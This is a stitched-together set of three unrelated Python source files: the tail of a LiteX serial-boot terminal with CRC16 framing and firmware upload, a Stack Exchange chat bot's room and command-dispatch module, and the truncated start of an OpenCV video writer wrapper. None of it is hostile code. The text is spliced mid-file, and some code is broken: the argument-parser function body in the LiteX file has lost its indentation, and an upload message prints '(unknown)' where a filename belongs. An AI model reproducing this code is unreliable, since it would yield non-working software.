    def compute_crc(self):
        """CRC16 over command + payload, as expected by the device."""
        return crc16(self.cmd + self.payload)

    def encode(self):
        """Serialize as: length (1 byte), CRC16 (2 bytes big-endian), cmd, payload."""
        header = bytes([len(self.payload)]) + self.compute_crc().to_bytes(2, "big")
        return header + self.cmd + self.payload
# CRC16 --------------------------------------------------------------------------------------------
# Precomputed CRC16 lookup table, one entry per byte value.
crc16_table = [
    0x0000, 0x1021, 0x2042, 0x3063, 0x4084, 0x50A5, 0x60C6, 0x70E7,
    0x8108, 0x9129, 0xA14A, 0xB16B, 0xC18C, 0xD1AD, 0xE1CE, 0xF1EF,
    0x1231, 0x0210, 0x3273, 0x2252, 0x52B5, 0x4294, 0x72F7, 0x62D6,
    0x9339, 0x8318, 0xB37B, 0xA35A, 0xD3BD, 0xC39C, 0xF3FF, 0xE3DE,
    0x2462, 0x3443, 0x0420, 0x1401, 0x64E6, 0x74C7, 0x44A4, 0x5485,
    0xA56A, 0xB54B, 0x8528, 0x9509, 0xE5EE, 0xF5CF, 0xC5AC, 0xD58D,
    0x3653, 0x2672, 0x1611, 0x0630, 0x76D7, 0x66F6, 0x5695, 0x46B4,
    0xB75B, 0xA77A, 0x9719, 0x8738, 0xF7DF, 0xE7FE, 0xD79D, 0xC7BC,
    0x48C4, 0x58E5, 0x6886, 0x78A7, 0x0840, 0x1861, 0x2802, 0x3823,
    0xC9CC, 0xD9ED, 0xE98E, 0xF9AF, 0x8948, 0x9969, 0xA90A, 0xB92B,
    0x5AF5, 0x4AD4, 0x7AB7, 0x6A96, 0x1A71, 0x0A50, 0x3A33, 0x2A12,
    0xDBFD, 0xCBDC, 0xFBBF, 0xEB9E, 0x9B79, 0x8B58, 0xBB3B, 0xAB1A,
    0x6CA6, 0x7C87, 0x4CE4, 0x5CC5, 0x2C22, 0x3C03, 0x0C60, 0x1C41,
    0xEDAE, 0xFD8F, 0xCDEC, 0xDDCD, 0xAD2A, 0xBD0B, 0x8D68, 0x9D49,
    0x7E97, 0x6EB6, 0x5ED5, 0x4EF4, 0x3E13, 0x2E32, 0x1E51, 0x0E70,
    0xFF9F, 0xEFBE, 0xDFDD, 0xCFFC, 0xBF1B, 0xAF3A, 0x9F59, 0x8F78,
    0x9188, 0x81A9, 0xB1CA, 0xA1EB, 0xD10C, 0xC12D, 0xF14E, 0xE16F,
    0x1080, 0x00A1, 0x30C2, 0x20E3, 0x5004, 0x4025, 0x7046, 0x6067,
    0x83B9, 0x9398, 0xA3FB, 0xB3DA, 0xC33D, 0xD31C, 0xE37F, 0xF35E,
    0x02B1, 0x1290, 0x22F3, 0x32D2, 0x4235, 0x5214, 0x6277, 0x7256,
    0xB5EA, 0xA5CB, 0x95A8, 0x8589, 0xF56E, 0xE54F, 0xD52C, 0xC50D,
    0x34E2, 0x24C3, 0x14A0, 0x0481, 0x7466, 0x6447, 0x5424, 0x4405,
    0xA7DB, 0xB7FA, 0x8799, 0x97B8, 0xE75F, 0xF77E, 0xC71D, 0xD73C,
    0x26D3, 0x36F2, 0x0691, 0x16B0, 0x6657, 0x7676, 0x4615, 0x5634,
    0xD94C, 0xC96D, 0xF90E, 0xE92F, 0x99C8, 0x89E9, 0xB98A, 0xA9AB,
    0x5844, 0x4865, 0x7806, 0x6827, 0x18C0, 0x08E1, 0x3882, 0x28A3,
    0xCB7D, 0xDB5C, 0xEB3F, 0xFB1E, 0x8BF9, 0x9BD8, 0xABBB, 0xBB9A,
    0x4A75, 0x5A54, 0x6A37, 0x7A16, 0x0AF1, 0x1AD0, 0x2AB3, 0x3A92,
    0xFD2E, 0xED0F, 0xDD6C, 0xCD4D, 0xBDAA, 0xAD8B, 0x9DE8, 0x8DC9,
    0x7C26, 0x6C07, 0x5C64, 0x4C45, 0x3CA2, 0x2C83, 0x1CE0, 0x0CC1,
    0xEF1F, 0xFF3E, 0xCF5D, 0xDF7C, 0xAF9B, 0xBFBA, 0x8FD9, 0x9FF8,
    0x6E17, 0x7E36, 0x4E55, 0x5E74, 0x2E93, 0x3EB2, 0x0ED1, 0x1EF0
]

def crc16(l):
    """Return the table-driven CRC16 of the byte sequence l."""
    crc = 0
    for d in l:
        crc = crc16_table[((crc >> 8) ^ d) & 0xff] ^ (crc << 8)
    return crc & 0xffff
# LiteXTerm ----------------------------------------------------------------------------------------
class LiteXTerm:
    """Serial terminal for LiteX targets with SFL serial-boot support.

    Bridges the local console to a serial port (or pty-backed bridge),
    watches the incoming stream for the BIOS's serial-boot prompt/magic
    strings, and uploads the configured images using the SFL framing
    protocol before jumping to the boot address.
    """

    def __init__(self, serial_boot, kernel_image, kernel_address, json_images):
        self.serial_boot = serial_boot
        # kernel_image and json_images are mutually exclusive.
        assert not (kernel_image is not None and json_images is not None)
        self.mem_regions = {}
        if kernel_image is not None:
            self.mem_regions = {kernel_image: kernel_address}
            self.boot_address = kernel_address
        if json_images is not None:
            f = open(json_images, "r")
            json_dir = os.path.dirname(json_images)
            for k, v in json.load(f).items():
                self.mem_regions[os.path.join(json_dir, k)] = v
            # Boot at the address of the last image listed in the JSON file.
            self.boot_address = self.mem_regions[list(self.mem_regions.keys())[-1]]
            f.close()

        self.reader_alive = False
        self.writer_alive = False

        # Rolling byte windows compared against the prompt/magic request strings.
        self.prompt_detect_buffer = bytes(len(sfl_prompt_req))
        self.magic_detect_buffer = bytes(len(sfl_magic_req))

        self.console = Console()

        signal.signal(signal.SIGINT, self.sigint)
        self.sigint_time_last = 0

    def open(self, port, baudrate):
        """Open the serial port (idempotent) and pick per-port SFL tuning."""
        if hasattr(self, "port"):
            return
        # FIXME: https://github.com/enjoy-digital/litex/issues/720
        if "ttyACM" in port:
            self.payload_length = sfl_payload_length
            self.delay = 1e-4
        elif "tty.usbmodem" in port:
            self.payload_length = sfl_payload_length
            self.delay = 1e-3
        else:
            self.payload_length = 64
            self.delay = 1e-5
        self.port = serial.serial_for_url(port, baudrate)

    def close(self):
        if not hasattr(self, "port"):
            return
        self.port.close()
        del self.port

    def sigint(self, sig, frame):
        """Forward CTRL-C to the device; a double CTRL-C within 0.5s exits."""
        if hasattr(self, "port"):
            self.port.write(b"\x03")
        sigint_time_current = time.time()
        # Exit term if 2 CTRL-C pressed in less than 0.5s.
        if (sigint_time_current - self.sigint_time_last < 0.5):
            self.console.unconfigure()
            self.close()
            sys.exit()
        else:
            self.sigint_time_last = sigint_time_current

    def send_frame(self, frame):
        """Send one SFL frame, retrying on CRC error; 1 on success, 0 on unknown reply."""
        retry = 1
        while retry:
            self.port.write(frame.encode())
            # Get the reply from the device
            reply = self.port.read()
            if reply == sfl_ack_success:
                retry = 0
            elif reply == sfl_ack_crcerror:
                retry = 1
            else:
                print("[LXTERM] Got unknown reply '{}' from the device, aborting.".format(reply))
                return 0
        return 1

    def receive_upload_response(self):
        """Read one upload ACK: True on success, None (fall-through) on CRC error, exit otherwise."""
        reply = self.port.read()
        if reply == sfl_ack_success:
            return True
        elif reply == sfl_ack_crcerror:
            print("[LXTERM] Upload to device failed due to data corruption (CRC error)")
        else:
            print(f"[LXTERM] Got unexpected response from device '{reply}'")
            sys.exit(1)

    def upload(self, filename, address):
        """Stream filename to the device at address with pipelined SFL load frames.

        Keeps up to sfl_outstanding frames in flight, draining ACKs as they
        arrive.  Returns the number of bytes uploaded.
        """
        f = open(filename, "rb")
        # Measure the file length by seeking to its end.
        f.seek(0, 2)
        length = f.tell()
        f.seek(0, 0)
        print(f"[LXTERM] Uploading (unknown) to 0x{address:08x} ({length} bytes)...")
        # Prepare parameters
        current_address = address
        position = 0
        start = time.time()
        remaining = length
        outstanding = 0
        while remaining:
            # Show progress
            sys.stdout.write("|{}>{}| {}%\r".format(
                "=" * (20*position//length),
                " " * (20-20*position//length),
                100*position//length))
            sys.stdout.flush()
            # Send frame if max outstanding not reached.
            if outstanding <= sfl_outstanding:
                # Prepare frame.
                frame = SFLFrame()
                frame.cmd = sfl_cmd_load
                # 4 bytes of each payload carry the destination address.
                frame_data = f.read(min(remaining, self.payload_length-4))
                frame.payload = current_address.to_bytes(4, "big")
                frame.payload += frame_data
                # Encode frame and send it.
                self.port.write(frame.encode())
                # Update parameters
                current_address += len(frame_data)
                position += len(frame_data)
                remaining -= len(frame_data)
                outstanding += 1
            # Inter-frame delay.
            time.sleep(self.delay)
            # Read response if available.
            while self.port.in_waiting:
                ack = self.receive_upload_response()
                if ack:
                    outstanding -= 1
                break
        # Get remaining responses.
        for _ in range(outstanding):
            self.receive_upload_response()
        # Compute speed.
        end = time.time()
        elapsed = end - start
        print("[LXTERM] Upload complete ({0:.1f}KB/s).".format(length/(elapsed*1024)))
        f.close()
        return length

    def boot(self):
        """Send the SFL jump command to start execution at boot_address."""
        print("[LXTERM] Booting the device.")
        frame = SFLFrame()
        frame.cmd = sfl_cmd_jump
        # boot_address is kept as a hex string (e.g. "0x40000000").
        frame.payload = int(self.boot_address, 16).to_bytes(4, "big")
        self.send_frame(frame)

    def detect_prompt(self, data):
        """Slide data into the window; True when it matches the F7 boot prompt."""
        if len(data):
            self.prompt_detect_buffer = self.prompt_detect_buffer[1:] + data
            return self.prompt_detect_buffer == sfl_prompt_req
        else:
            return False

    def answer_prompt(self):
        print("[LXTERM] Received serial boot prompt from the device.")
        self.port.write(sfl_prompt_ack)

    def detect_magic(self, data):
        """Slide data into the window; True when it matches the SFL magic request."""
        if len(data):
            self.magic_detect_buffer = self.magic_detect_buffer[1:] + data
            return self.magic_detect_buffer == sfl_magic_req
        else:
            return False

    def answer_magic(self):
        """Acknowledge the magic request, upload all images, then boot."""
        print("[LXTERM] Received firmware download request from the device.")
        if(len(self.mem_regions)):
            self.port.write(sfl_magic_ack)
        for filename, base in self.mem_regions.items():
            self.upload(filename, int(base, 16))
        self.boot()
        print("[LXTERM] Done.")

    def reader(self):
        """Pump device -> stdout, watching for the boot prompt/magic sequences."""
        try:
            while self.reader_alive:
                c = self.port.read()
                sys.stdout.buffer.write(c)
                sys.stdout.flush()
                if len(self.mem_regions):
                    if self.serial_boot and self.detect_prompt(c):
                        self.answer_prompt()
                    if self.detect_magic(c):
                        self.answer_magic()
        except serial.SerialException:
            self.reader_alive = False
            self.console.unconfigure()
            raise

    def start_reader(self):
        self.reader_alive = True
        self.reader_thread = threading.Thread(target=self.reader)
        self.reader_thread.setDaemon(True)
        self.reader_thread.start()

    def stop_reader(self):
        self.reader_alive = False
        self.reader_thread.join()

    def writer(self):
        """Pump console keystrokes -> device, translating escape sequences."""
        try:
            while self.writer_alive:
                b = self.console.getkey()
                if b == b"\x03":
                    self.stop()
                elif b == b"\n":
                    self.port.write(b"\x0a")
                elif self.console.escape_char(b):
                    b = self.console.getkey()
                    ansi_seq = self.console.handle_escape(b)
                    self.port.write(ansi_seq)
                else:
                    self.port.write(b)
        except:
            self.writer_alive = False
            self.console.unconfigure()
            raise

    def start_writer(self):
        self.writer_alive = True
        self.writer_thread = threading.Thread(target=self.writer)
        self.writer_thread.setDaemon(True)
        self.writer_thread.start()

    def stop_writer(self):
        self.writer_alive = False
        self.writer_thread.join()

    def start(self):
        self.start_reader()
        self.start_writer()

    def stop(self):
        # Only clears the flags; the threads exit on their next loop check.
        self.reader_alive = False
        self.writer_alive = False

    def join(self, writer_only=False):
        self.writer_thread.join()
        if not writer_only:
            self.reader_thread.join()
# Run ----------------------------------------------------------------------------------------------
def _get_args():
parser = argparse.ArgumentParser()
parser.add_argument("port", help="Serial port (eg /dev/tty*, bridge, jtag)")
parser.add_argument("--speed", default=115200, help="Serial baudrate")
parser.add_argument("--serial-boot", default=False, action='store_true', help="Automatically initiate serial boot")
parser.add_argument("--kernel", default=None, help="Kernel image")
parser.add_argument("--kernel-adr", default="0x40000000", help="Kernel address")
parser.add_argument("--images", default=None, help="JSON description of the images to load to memory")
parser.add_argument("--bridge-name", default="uart_xover", help="Bridge UART name to use (present in design/csr.csv)")
parser.add_argument("--jtag-name", default="jtag_uart", help="JTAG UART type: jtag_uart (default), jtag_atlantic")
parser.add_argument("--jtag-config", default="openocd_xc7_ft2232.cfg", help="OpenOCD JTAG configuration file for jtag_uart")
parser.add_argument("--jtag-chain", default=1, help="JTAG chain.")
return parser.parse_args()
def main():
    """Entry point: resolve the port (serial / bridge / jtag) and run the terminal."""
    args = _get_args()
    term = LiteXTerm(args.serial_boot, args.kernel, args.kernel_adr, args.images)

    if sys.platform == "win32":
        # Bridge/JTAG modes rely on pty, which is POSIX-only.
        if args.port in ["bridge", "jtag"]:
            raise NotImplementedError

    if args.port in ["bridge", "crossover"]: # FIXME: 2021-02-18, crossover for retro-compatibility remove and update targets?
        bridge = BridgeUART(name=args.bridge_name)
        bridge.open()
        port = os.ttyname(bridge.name)
    elif args.port in ["jtag"]:
        if args.jtag_name == "jtag_atlantic":
            term.port = Nios2Terminal()
            port = args.port
            # Intel JTAG UART tolerates larger frames with minimal delay.
            term.payload_length = 128
            term.delay = 1e-6
        elif args.jtag_name == "jtag_uart":
            bridge = JTAGUART(config=args.jtag_config, chain=int(args.jtag_chain))
            bridge.open()
            port = os.ttyname(bridge.name)
        else:
            raise NotImplementedError
    else:
        port = args.port
    term.open(port, int(float(args.speed)))
    term.console.configure()
    term.start()
    # Wait on the writer only; the reader is a daemon thread.
    term.join(True)
# Run the terminal when executed as a script.
if __name__ == "__main__":
    main()
|
chatcommunicate.py | from ChatExchange.chatexchange import events
from ChatExchange.chatexchange.messages import Message
from chatexchange_extension import Client
import collections
import itertools
import os.path
import pickle
import queue
import regex
import requests
import sys
import threading
import time
import yaml
import datahandling
from deletionwatcher import DeletionWatcher
from excepthook import log_exception
from globalvars import GlobalVars
from parsing import fetch_post_url_from_msg_content, fetch_owner_url_from_msg_content
# (messages, reports): per-room deques of recent message ids plus an ordered
# map of report metadata; pickled to messageData.p across restarts.
LastMessages = collections.namedtuple("LastMessages", ["messages", "reports"])
class RoomData:
    """Mutable per-room state: the room handle, its block-until time, and
    whether a deletion watcher is attached."""

    def __init__(self, room, block_time, deletion_watcher):
        self.room, self.block_time, self.deletion_watcher = \
            room, block_time, deletion_watcher
class CmdException(Exception):
    """Raised by chat commands; its text is returned to the room as the reply."""
    pass
# Registered chat commands, keyed by invocation style.
_commands = {"reply": {}, "prefix": {}}

# One Client per chat host; filled in by init().
_clients = {
    "stackexchange.com": None,
    "stackoverflow.com": None,
    "meta.stackexchange.com": None
}

# (site, room_id) sets/maps built from rooms.yml by parse_room_config().
_command_rooms = set()
_watcher_rooms = set()
_room_roles = {}
_privileges = {}

# Epoch time until which *all* posting is blocked (-1 = not blocked).
_global_block = -1
_rooms = {}
_last_messages = LastMessages({}, collections.OrderedDict())

# Outgoing message queue consumed by the send_messages() worker thread.
_msg_queue = queue.Queue()

# Set whenever _last_messages changes; wakes the pickling worker.
_pickle_run = threading.Event()
def init(username, password):
    """Log into all chat hosts, load the room config, and start worker threads.

    Retries each login up to 10 times before giving up.  Restores the last
    pickled message/report state from messageData.p when present, then
    starts the pickling and message-sending daemon threads.
    """
    global _clients
    global _rooms
    global _room_data
    global _last_messages

    for site in _clients.keys():
        client = Client(site)

        for _ in range(10):
            try:
                client.login(username, password)
                break
            except Exception:
                # Transient login failure: retry (up to 10 attempts).
                # Fix: this was a bare `except:`, which also swallowed
                # SystemExit/KeyboardInterrupt and made the retry loop
                # uninterruptible.
                pass
        else:
            raise Exception("Failed to log into " + site)

        _clients[site] = client

    if os.path.exists("rooms_custom.yml"):
        parse_room_config("rooms_custom.yml")
    else:
        parse_room_config("rooms.yml")

    if not GlobalVars.standby_mode:
        join_command_rooms()

    if os.path.isfile("messageData.p"):
        try:
            _last_messages = pickle.load(open("messageData.p", "rb"))
        except EOFError:
            # Truncated/empty pickle: start with fresh state.
            pass

    threading.Thread(name="pickle ---rick--- runner", target=pickle_last_messages, daemon=True).start()
    threading.Thread(name="message sender", target=send_messages, daemon=True).start()
def join_command_rooms():
    """Join every room flagged `commands` in the config and hook on_msg."""
    for site, roomid in _command_rooms:
        room = _clients[site].get_room(roomid)
        deletion_watcher = (site, roomid) in _watcher_rooms

        room.join()
        room.watch_socket(on_msg)
        _rooms[(site, roomid)] = RoomData(room, -1, deletion_watcher)
def parse_room_config(path):
    """Populate the privilege/command/watcher/role tables from a YAML file.

    Expected layout: {site: {room_id: {privileges?, commands?, watcher?,
    msg_types?}}}.
    """
    with open(path, "r") as room_config:
        # Fix: use safe_load — the config is plain data, and yaml.load()
        # without an explicit Loader is deprecated and can instantiate
        # arbitrary Python objects from the file.
        room_dict = yaml.safe_load(room_config)

    for site, site_rooms in room_dict.items():
        for roomid, room in site_rooms.items():
            room_identifier = (site, roomid)
            _privileges[room_identifier] = set(room["privileges"]) if "privileges" in room else set()

            if "commands" in room and room["commands"]:
                _command_rooms.add(room_identifier)

            if "watcher" in room and room["watcher"]:
                _watcher_rooms.add(room_identifier)

            if "msg_types" in room:
                add_room(room_identifier, room["msg_types"])
def add_room(room, roles):
    """Register room under every role in roles within the global role map."""
    for role in roles:
        _room_roles.setdefault(role, set()).add(room)
def pickle_last_messages():
    """Worker loop: persist _last_messages to messageData.p whenever signalled."""
    while True:
        _pickle_run.wait()
        _pickle_run.clear()

        with open("messageData.p", "wb") as pickle_file:
            pickle.dump(_last_messages, pickle_file)
def send_messages():
    """Worker loop: post queued messages, with up to 3 retries on HTTP errors.

    Tracks the ids of the last 100 messages per room and up to 50 report
    metadata entries, spawns a deletion watcher for watched rooms, and kicks
    the pickling worker after each successful post.
    """
    while True:
        room, msg, report_data = _msg_queue.get()

        full_retries = 0
        while full_retries < 3:
            try:
                response = room.room._client._do_action_despite_throttling(("send", room.room.id, msg)).json()

                if "id" in response:
                    identifier = (room.room._client.host, room.room.id)
                    message_id = response["id"]

                    # Remember this message id (bounded to ~100 per room).
                    if identifier not in _last_messages.messages:
                        _last_messages.messages[identifier] = collections.deque((message_id,))
                    else:
                        last = _last_messages.messages[identifier]
                        if len(last) > 100:
                            last.popleft()
                        last.append(message_id)

                    if report_data:
                        # Bounded (50 entries) report-metadata cache, oldest evicted first.
                        _last_messages.reports[(room.room._client.host, message_id)] = report_data
                        if len(_last_messages.reports) > 50:
                            _last_messages.reports.popitem(last=False)

                        if room.deletion_watcher:
                            threading.Thread(name="deletion watcher",
                                             target=DeletionWatcher.check_if_report_was_deleted,
                                             args=(report_data[0], room.room._client.get_message(message_id))).start()

                    _pickle_run.set()

                break
            except requests.exceptions.HTTPError:
                full_retries += 1

        _msg_queue.task_done()
def on_msg(msg, client):
    """Socket callback: route incoming room messages to command dispatchers.

    Handles replies to this bot, "sd <cmds>" shorthand, and "!!/"-prefixed
    commands; queues any command output as a reply in the same room.
    """
    if isinstance(msg, events.MessagePosted) or isinstance(msg, events.MessageEdited):
        message = msg.message

        if message.owner.id == client._br.user_id:
            # Ignore our own messages.
            return

        room_data = _rooms[(client.host, message.room.id)]

        if message.parent and message.parent.owner.id == client._br.user_id:
            # Reply to one of our messages: strip the @-mention, take the
            # first word as the command name.
            strip_mention = regex.sub("^(<span class='mention'>)?@.*?(</span>)? ", "", message.content)
            cmd = GlobalVars.parser.unescape(strip_mention).lower().split(" ", 1)[0]

            result = dispatch_reply_command(message.parent, message, cmd)
            if result:
                _msg_queue.put((room_data, ":{} {}".format(message.id, result), None))
        elif message.content.startswith("sd "):
            result = dispatch_shorthand_command(message)
            if result:
                _msg_queue.put((room_data, ":{} {}".format(message.id, result), None))
        elif message.content.startswith("!!/"):
            result = dispatch_command(message)
            if result:
                _msg_queue.put((room_data, ":{} {}".format(message.id, result), None))
def tell_rooms_with(prop, msg, notify_site="", report_data=None):
    """Post msg to every room whose roles include `prop`."""
    tell_rooms(msg, (prop,), (), notify_site=notify_site, report_data=report_data)
def tell_rooms_without(prop, msg, notify_site="", report_data=None):
    """Post msg to every room whose roles do NOT include `prop`."""
    tell_rooms(msg, (), (prop,), notify_site=notify_site, report_data=report_data)
def tell_rooms(msg, has, hasnt, notify_site="", report_data=None):
    """Post msg to every room whose roles include all of `has` and none of `hasnt`.

    Rooms are joined lazily on first use.  Per-site notification pings are
    appended when notify_site is given.  Posting respects per-room and
    global blocks; rooms with the "delay" role get posted via the deletion
    watcher instead of directly.
    """
    global _rooms

    msg = msg.rstrip()
    target_rooms = set()

    for prop_has in has:
        if prop_has not in _room_roles:
            continue

        for room in _room_roles[prop_has]:
            # Exclude rooms carrying any of the `hasnt` roles.
            if all(map(lambda prop: prop not in _room_roles or room not in _room_roles[prop], hasnt)):
                if room not in _rooms:
                    # Lazily join rooms we haven't used yet.
                    site, roomid = room
                    deletion_watcher = room in _watcher_rooms

                    new_room = _clients[site].get_room(roomid)
                    new_room.join()

                    _rooms[room] = RoomData(new_room, -1, deletion_watcher)

                target_rooms.add(room)

    for room_id in target_rooms:
        room = _rooms[room_id]

        if notify_site:
            pings = datahandling.get_user_names_on_notification_list(room.room._client.host,
                                                                     room.room.id,
                                                                     notify_site,
                                                                     room.room._client)
            msg_pings = datahandling.append_pings(msg, pings)
        else:
            msg_pings = msg

        timestamp = time.time()

        # Skip rooms (or everything) currently blocked.
        if room.block_time < timestamp and _global_block < timestamp:
            if report_data and "delay" in _room_roles and room_id in _room_roles["delay"]:
                threading.Thread(name="delayed post",
                                 target=DeletionWatcher.post_message_if_not_deleted,
                                 args=(msg_pings, room, report_data)).start()
            else:
                _msg_queue.put((room, msg_pings, report_data))
def get_last_messages(room, count):
    """Yield up to `count` of our most recent Message objects in room, newest first."""
    identifier = (room._client.host, room.id)

    if identifier not in _last_messages.messages:
        return

    for msg_id in itertools.islice(reversed(_last_messages.messages[identifier]), count):
        yield room._client.get_message(msg_id)
def get_report_data(message):
    """Return (post_url, owner_url) for a report message, or None.

    Prefers the cached report metadata; otherwise falls back to parsing the
    message content itself.
    """
    identifier = (message._client.host, message.id)

    if identifier in _last_messages.reports:
        return _last_messages.reports[identifier]
    else:
        post_url = fetch_post_url_from_msg_content(message.content_source)

        if post_url:
            return (post_url, fetch_owner_url_from_msg_content(message.content_source))
def is_privileged(user, room):
    """True if user is a moderator or listed in the room's privilege set."""
    return user.id in _privileges[(room._client.host, room.id)] or user.is_moderator
def block_room(room_id, site, time):
    """Block posting until epoch `time`: globally when room_id is None,
    otherwise just for (site, room_id).

    NOTE(review): the `time` parameter shadows the `time` module inside this
    function; harmless here, but easy to trip over when editing.
    """
    global _global_block

    if room_id is None:
        _global_block = time
    else:
        _rooms[(site, room_id)].block_time = time
def command(*type_signature, reply=False, whole_msg=False, privileged=False, arity=None, aliases=None, give_name=False):
    """Decorator factory registering a chat command.

    type_signature: one coercion callable per positional argument.
    reply:      register as a reply-command rather than a "!!/" prefix command.
    whole_msg:  pass the triggering message as the first argument.
    privileged: require room privileges (checked at call time).
    arity:      explicit (min, max) argument count; defaults to the
                signature length for both.
    aliases:    extra names to register the command under.
    give_name:  also pass alias_used= to the wrapped function.
    """
    if aliases is None:
        aliases = []

    def decorator(func):
        def f(*args, original_msg=None, alias_used=None, quiet_action=False):
            if privileged and not is_privileged(original_msg.owner, original_msg.room):
                return GlobalVars.not_privileged_warning

            if whole_msg:
                processed_args = [original_msg]
            else:
                processed_args = []

            try:
                try:
                    # Coerce each textual argument; empty/None args pass through.
                    processed_args.extend([coerce(arg) if arg else arg for coerce, arg in zip(type_signature, args)])
                except ValueError as e:
                    return "Invalid input type given for an argument"

                if give_name:
                    result = func(*processed_args, alias_used=alias_used)
                else:
                    result = func(*processed_args)

                # Quiet variants ("command-") suppress the reply text.
                return result if not quiet_action else ""
            except CmdException as e:
                # Command-raised errors are relayed verbatim to the room.
                return str(e)
            except:
                log_exception(*sys.exc_info())
                return "I hit an error while trying to run that command; run `!!/errorlogs` for details."

        cmd = (f, arity if arity else (len(type_signature), len(type_signature)))

        if reply:
            _commands["reply"][func.__name__] = cmd

            for alias in aliases:
                _commands["reply"][alias] = cmd
        else:
            _commands["prefix"][func.__name__] = cmd

            for alias in aliases:
                _commands["prefix"][alias] = cmd

        return f
    return decorator
def message(msg):
    """Coercion for command signatures: require a chat Message instance."""
    assert isinstance(msg, Message)
    return msg
def dispatch_command(msg):
    """Parse and run a "!!/command args" message; return the reply text (or None)."""
    command_parts = GlobalVars.parser.unescape(msg.content).split(" ", 1)

    if len(command_parts) == 2:
        cmd, args = command_parts
    else:
        cmd, = command_parts
        args = ""

    # Bare "!!/" with no command name: nothing to do.
    if len(cmd) == 3:
        return

    command_name = cmd[3:].lower()

    # A trailing "-" marks the quiet variant (suppress the reply text).
    quiet_action = command_name[-1] == "-"
    command_name = regex.sub(r"[[:punct:]]*$", "", command_name)

    if command_name not in _commands["prefix"]:
        return "No such command '{}'.".format(command_name)
    else:
        func, (min_arity, max_arity) = _commands["prefix"][command_name]

        if max_arity == 0:
            return func(original_msg=msg, alias_used=command_name, quiet_action=quiet_action)
        elif max_arity == 1:
            if min_arity == 1 and not args:
                return "Missing an argument."

            return func(args or None, original_msg=msg, alias_used=command_name, quiet_action=quiet_action)
        else:
            args = args.split()

            if len(args) < min_arity:
                return "Too few arguments."
            elif len(args) > max_arity:
                return "Too many arguments."
            else:
                # Pad optional trailing arguments with None.
                args.extend([None] * (max_arity - len(args)))
                return func(*args, original_msg=msg, alias_used=command_name, quiet_action=quiet_action)
def dispatch_reply_command(msg, reply, cmd):
    """Run reply-command `cmd` (issued in `reply`) against our message `msg`."""
    # A trailing "-" marks the quiet variant.
    quiet_action = cmd[-1] == "-"
    cmd = regex.sub(r"\W*$", "", cmd)

    if cmd in _commands["reply"]:
        func, arity = _commands["reply"][cmd]

        # Reply commands always take exactly the target message.
        assert arity == (1, 1)

        return func(msg, original_msg=reply, alias_used=cmd, quiet_action=quiet_action)
def dispatch_shorthand_command(msg):
    """Run "sd cmd1 cmd2 ..." against our most recent messages, newest first.

    A numeric prefix repeats a command (e.g. "2k" -> "k" twice); "-" skips
    the corresponding message.  Returns combined output, or "" when no
    command produced a reply.
    """
    commands = GlobalVars.parser.unescape(msg.content[3:]).split()

    if len(commands) == 0:
        return

    output = []
    processed_commands = []

    for cmd in commands:
        # Expand counts so e.g. "2k" becomes ["k", "k"].
        count, cmd = regex.match(r"^(\d*)(.*)", cmd).groups()
        for _ in range(int(count) if count else 1):
            processed_commands.append(cmd)

    should_return_output = False

    for current_command, message in zip(processed_commands, get_last_messages(msg.room, len(processed_commands))):
        if current_command == "-":
            output.append("[:{}] <skipped>".format(message.id))
        else:
            result = dispatch_reply_command(message, msg, current_command)

            if result:
                should_return_output = True
                output.append("[:{}] {}".format(message.id, result))
            else:
                output.append("[:{}] <processed without return value>".format(message.id))

    return "\n".join(output) if should_return_output else ""
|
videowriter.py | """
Copyright 2018-2021 Accenture
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os, sys
current_dir = os.path.dirname(os.path.realpath(__file__))
sys.path.insert(0, os.path.join(current_dir))
import cv2
import shutil
from threading import Thread, RLock
from queue import Queue, Full, Empty
import vidtools as vid
class VideoWriter(object):
    ''' OpenCV VideoWriter wrapper '''

    def __init__(self, output_path, resolution, fps, codec="avc1", compress=True, placeholder=False, bgr_to_rgb=False):
        # If output_path is an existing directory, frames are written as
        # individual PNG images; otherwise a single video file is produced.
        self.write_mode = "images" if os.path.isdir(output_path) else "video"
        self.resolution = resolution
        self.output_path = output_path
        self.compress = compress
        self.fourcc = cv2.VideoWriter_fourcc(*codec)
        self.fps = fps
        self.writer = None
        # makes this object an empty shell (placeholder)
        # to ensure syntactic correctness without the need
        # to modify the "with" block when conditionally disabling video writing
        self.placeholder = placeholder
        self.bgr_to_rgb = bgr_to_rgb
        self.frames_written = 0

    def __enter__(self):
        if not self.placeholder:
            print(f"VideoWriter: writing output {self.write_mode} to {self.output_path}")
            self.init()
        return self

    def __exit__(self, type, value, traceback):
        if not self.placeholder:
            self.close()

    def init(self):
        """Create the output directory and, in video mode, the cv2 writer."""
        os.makedirs(os.path.dirname(self.output_path), exist_ok=True)
        if self.write_mode == "video":
            self.writer = cv2.VideoWriter(
                self.output_path, self.fourcc, int(self.fps), self.resolution)

    def close(self):
        """Release the writer and optionally recompress the file with FFmpeg."""
        if self.write_mode == "video":
            self.writer.release()
            if self.compress:
                if shutil.which("ffmpeg"):
                    print("Compressing video...")
                    new_output_path = vid.compress_video(self.output_path, create_copy=True)
                    os.remove(self.output_path)
                    self.output_path = new_output_path
                else:
                    print("WARNING: FFmpeg executable not found, skipping compression...")
        print("Wrote output to:", self.output_path)

    def write(self, frame, title=None):
        """Write one frame (video mode) or save it as a PNG (images mode)."""
        if not self.placeholder:
            if self.write_mode == "video":
                if self.bgr_to_rgb:
                    frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
                self.writer.write(cv2.resize(frame, self.resolution, interpolation=cv2.INTER_CUBIC))
            else:
                # Images mode: `title` overrides the default frame_N name.
                if title is None:
                    cv2.imwrite(os.path.join(self.output_path, f'frame_{self.frames_written + 1}.png'), frame)
                else:
                    cv2.imwrite(os.path.join(self.output_path, f'{title}.png'), frame)
            self.frames_written += 1
class AsyncVideoWriter(VideoWriter):
    """ Asynchronous version of the VideoWriter module """

    def __init__(self, output_path, resolution, fps, codec="avc1", compress=True, placeholder=False,
                 bgr_to_rgb=False, max_size=10):
        super().__init__(output_path, resolution, fps, codec, compress, placeholder, bgr_to_rgb)
        self._lock = RLock()
        # Bounded frame queue between the producer (write) and writer thread.
        self._buffer = Queue(maxsize = max_size)
        self._writer = None
        self._running = False

    def __enter__(self):
        if not self.placeholder:
            super().init()
            self.init()
        return self
